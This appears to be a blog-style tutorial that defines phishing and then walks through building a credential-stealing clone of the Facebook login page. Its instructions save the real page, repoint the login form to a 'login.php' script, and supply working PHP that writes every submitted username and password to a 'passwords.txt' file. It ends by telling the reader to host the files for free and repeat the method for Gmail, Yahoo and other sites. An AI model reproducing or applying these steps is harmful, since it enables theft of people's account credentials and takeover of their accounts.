What is phishing ?
Phishing is a social engineering attack where a login page is created in order to steal information such as passwords and all other sensitive data from people. It involves cloning an original login page but tweaking it to store its login data in a readable format (txt). Phishing is the easiest way to steal login details for any site as it hacks the users not the server.
How phishing works
Supposing you go to Facebook you'll be greeted with the login page, any data entered into this page will be stored in their database and will log you in. Now assuming a person created his own version of Facebook login page but making it that whenever a user login that data is stored in a text file so he/she can read the contents anytime. After doing this the person gives you the link to the page after being hosted and you login he/she has successfully stolen your password to your Facebook and can login to your account anytime. Well this is what phishing is all about.
How to create phishing pages
In this example i am going to be cloning Facebook login page [No pictures included in this :( ]
- First open Facebook.com on your PC browser (Chrome will be best suited as this is what I always use) then navigate to the login page
- Then press Ctrl + S key (Save) on your keyboard or go to the tools side on the upper right and press Save with any name you like. This will make an offline clone of this page
- Open the html file there in a text editor like notepad or any other installed on your system
- press Ctrl + F (Find) and search for "action" this will bring up something like <form method = "post" action = .... right there replace action = with action = "login.php" and method = post with method = get
- Then save the html file as index.html
- Then enter this in a blank document in your text editor
$file = fopen("passwords.txt","a");
foreach ($_GET as $var => $val)
fwrite($file,$var." = ".$val."\n");
Then save this file as login.php
- Make sure the PHP file is in the same holder as the html file with all its relating files then host the files on a free hosting service like 000webfree host or some other hosting service. All stolen passwords will be saved to passwords.txt and you have a phishing page :)
This same procedure can be repeated for any other login page like Gmail, Yahoo and any other login you can think of. With this you can make phishing pages in under 10 minutes